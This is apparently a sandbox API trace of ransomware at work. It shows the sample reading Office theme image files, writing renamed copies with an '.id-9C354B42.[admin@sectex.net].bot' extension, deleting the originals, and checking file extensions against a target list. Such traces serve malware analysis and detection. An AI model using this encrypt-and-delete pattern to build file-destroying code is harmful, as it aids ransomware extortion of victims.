	[0043.672] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0043.672] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=28595) returned 1
	[0043.672] CloseHandle (hObject=0x1f8) returned 1
	[0043.673] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png")) returned 0x20
	[0043.673] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.673] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0043.673] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.673] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.673] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0043.673] GetLastError () returned 0x0
	[0043.673] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x6fb3, lpOverlapped=0x0) returned 1
	[0043.675] WriteFile (in: hFile=0x204, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x6fc0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x6fc0, lpOverlapped=0x0) returned 1
	[0043.676] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.676] WriteFile (in: hFile=0x204, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0043.677] SetEndOfFile (hFile=0x204) returned 1
	[0043.677] CloseHandle (hObject=0x204) returned 1
	[0043.679] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.679] SetEndOfFile (hFile=0x1f8) returned 1
	[0043.680] CloseHandle (hObject=0x1f8) returned 1
	[0043.680] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.680] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png")) returned 1
	[0043.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77
	[0043.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77
	[0043.681] lstrlenW (lpString=".doc") returned 4
	[0043.681] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.681] lstrlenW (lpString=".docx") returned 5
	[0043.681] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.681] lstrlenW (lpString=".pdf") returned 4
	[0043.681] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.681] lstrlenW (lpString=".xls") returned 4
	[0043.681] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.681] lstrlenW (lpString=".xlsx") returned 5
	[0043.681] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.681] lstrlenW (lpString=".ppt") returned 4
	[0043.681] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77
	[0043.681] lstrlenW (lpString=".zip") returned 4
	[0043.681] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.681] lstrlenW (lpString=".rar") returned 4
	[0043.681] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.681] lstrlenW (lpString=".bz2") returned 4
	[0043.681] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.681] lstrlenW (lpString=".7z") returned 3
	[0043.681] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77
	[0043.681] lstrlenW (lpString=".dbf") returned 4
	[0043.681] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77
	[0043.681] lstrlenW (lpString=".1cd") returned 4
	[0043.681] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77
	[0043.681] lstrlenW (lpString=".jpg") returned 4
	[0043.681] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77
	[0043.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77
	[0043.682] lstrlenW (lpString=".doc") returned 4
	[0043.682] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.682] lstrlenW (lpString=".docx") returned 5
	[0043.682] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.682] lstrlenW (lpString=".pdf") returned 4
	[0043.682] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.682] lstrlenW (lpString=".xls") returned 4
	[0043.682] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.682] lstrlenW (lpString=".xlsx") returned 5
	[0043.682] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.682] lstrlenW (lpString=".ppt") returned 4
	[0043.682] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77
	[0043.682] lstrlenW (lpString=".zip") returned 4
	[0043.682] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.682] lstrlenW (lpString=".rar") returned 4
	[0043.682] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.682] lstrlenW (lpString=".bz2") returned 4
	[0043.682] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.682] lstrlenW (lpString=".7z") returned 3
	[0043.682] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77
	[0043.682] lstrlenW (lpString=".dbf") returned 4
	[0043.682] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77
	[0043.682] lstrlenW (lpString=".1cd") returned 4
	[0043.682] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77
	[0043.682] lstrlenW (lpString=".jpg") returned 4
	[0043.682] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.683] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0043.683] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0043.683] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0043.683] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=3957) returned 1
	[0043.683] CloseHandle (hObject=0x1f8) returned 1
	[0043.683] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif")) returned 0x20
	[0043.683] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.683] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0043.683] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.683] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.683] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0043.685] GetLastError () returned 0x0
	[0043.685] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0xf75, lpOverlapped=0x0) returned 1
	[0043.688] WriteFile (in: hFile=0x214, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xf80, lpOverlapped=0x0) returned 1
	[0043.689] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.689] WriteFile (in: hFile=0x214, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0043.689] SetEndOfFile (hFile=0x214) returned 1
	[0043.689] CloseHandle (hObject=0x214) returned 1
	[0043.689] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.689] SetEndOfFile (hFile=0x1f8) returned 1
	[0043.690] CloseHandle (hObject=0x1f8) returned 1
	[0043.690] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.690] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif")) returned 1
	[0043.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76
	[0043.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76
	[0043.691] lstrlenW (lpString=".doc") returned 4
	[0043.691] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.691] lstrlenW (lpString=".docx") returned 5
	[0043.691] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.691] lstrlenW (lpString=".pdf") returned 4
	[0043.691] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.691] lstrlenW (lpString=".xls") returned 4
	[0043.691] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.691] lstrlenW (lpString=".xlsx") returned 5
	[0043.691] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.691] lstrlenW (lpString=".ppt") returned 4
	[0043.691] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76
	[0043.691] lstrlenW (lpString=".zip") returned 4
	[0043.691] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.691] lstrlenW (lpString=".rar") returned 4
	[0043.691] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.691] lstrlenW (lpString=".bz2") returned 4
	[0043.691] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.691] lstrlenW (lpString=".7z") returned 3
	[0043.691] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76
	[0043.691] lstrlenW (lpString=".dbf") returned 4
	[0043.691] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76
	[0043.691] lstrlenW (lpString=".1cd") returned 4
	[0043.691] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76
	[0043.691] lstrlenW (lpString=".jpg") returned 4
	[0043.691] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76
	[0043.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76
	[0043.691] lstrlenW (lpString=".doc") returned 4
	[0043.692] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.692] lstrlenW (lpString=".docx") returned 5
	[0043.692] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.692] lstrlenW (lpString=".pdf") returned 4
	[0043.692] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.692] lstrlenW (lpString=".xls") returned 4
	[0043.692] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.692] lstrlenW (lpString=".xlsx") returned 5
	[0043.692] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.692] lstrlenW (lpString=".ppt") returned 4
	[0043.692] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76
	[0043.692] lstrlenW (lpString=".zip") returned 4
	[0043.692] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.692] lstrlenW (lpString=".rar") returned 4
	[0043.692] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.692] lstrlenW (lpString=".bz2") returned 4
	[0043.692] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.692] lstrlenW (lpString=".7z") returned 3
	[0043.692] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76
	[0043.692] lstrlenW (lpString=".dbf") returned 4
	[0043.692] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76
	[0043.692] lstrlenW (lpString=".1cd") returned 4
	[0043.692] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76
	[0043.692] lstrlenW (lpString=".jpg") returned 4
	[0043.692] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.692] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0043.692] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0043.693] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0044.005] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=33277) returned 1
	[0044.006] CloseHandle (hObject=0x1a0) returned 1
	[0044.006] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png")) returned 0x20
	[0044.006] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.006] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0044.006] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.006] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.006] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0044.006] GetLastError () returned 0x0
	[0044.006] ReadFile (in: hFile=0x1a0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x81fd, lpOverlapped=0x0) returned 1
	[0044.008] WriteFile (in: hFile=0x1fc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x8200, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x8200, lpOverlapped=0x0) returned 1
	[0044.010] ReadFile (in: hFile=0x1a0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.010] WriteFile (in: hFile=0x1fc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0044.010] SetEndOfFile (hFile=0x1fc) returned 1
	[0044.010] CloseHandle (hObject=0x1fc) returned 1
	[0044.010] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.010] SetEndOfFile (hFile=0x1a0) returned 1
	[0044.011] CloseHandle (hObject=0x1a0) returned 1
	[0044.011] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.011] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png")) returned 1
	[0044.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77
	[0044.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77
	[0044.012] lstrlenW (lpString=".doc") returned 4
	[0044.012] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.012] lstrlenW (lpString=".docx") returned 5
	[0044.012] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.012] lstrlenW (lpString=".pdf") returned 4
	[0044.012] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.012] lstrlenW (lpString=".xls") returned 4
	[0044.012] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.012] lstrlenW (lpString=".xlsx") returned 5
	[0044.012] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.012] lstrlenW (lpString=".ppt") returned 4
	[0044.012] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77
	[0044.012] lstrlenW (lpString=".zip") returned 4
	[0044.012] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.012] lstrlenW (lpString=".rar") returned 4
	[0044.012] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.012] lstrlenW (lpString=".bz2") returned 4
	[0044.012] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.012] lstrlenW (lpString=".7z") returned 3
	[0044.012] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77
	[0044.012] lstrlenW (lpString=".dbf") returned 4
	[0044.012] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77
	[0044.012] lstrlenW (lpString=".1cd") returned 4
	[0044.012] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77
	[0044.012] lstrlenW (lpString=".jpg") returned 4
	[0044.012] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77
	[0044.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77
	[0044.013] lstrlenW (lpString=".doc") returned 4
	[0044.013] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.013] lstrlenW (lpString=".docx") returned 5
	[0044.013] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.013] lstrlenW (lpString=".pdf") returned 4
	[0044.013] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.013] lstrlenW (lpString=".xls") returned 4
	[0044.013] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.013] lstrlenW (lpString=".xlsx") returned 5
	[0044.013] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.013] lstrlenW (lpString=".ppt") returned 4
	[0044.013] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77
	[0044.013] lstrlenW (lpString=".zip") returned 4
	[0044.013] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.013] lstrlenW (lpString=".rar") returned 4
	[0044.013] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.013] lstrlenW (lpString=".bz2") returned 4
	[0044.013] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.013] lstrlenW (lpString=".7z") returned 3
	[0044.013] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
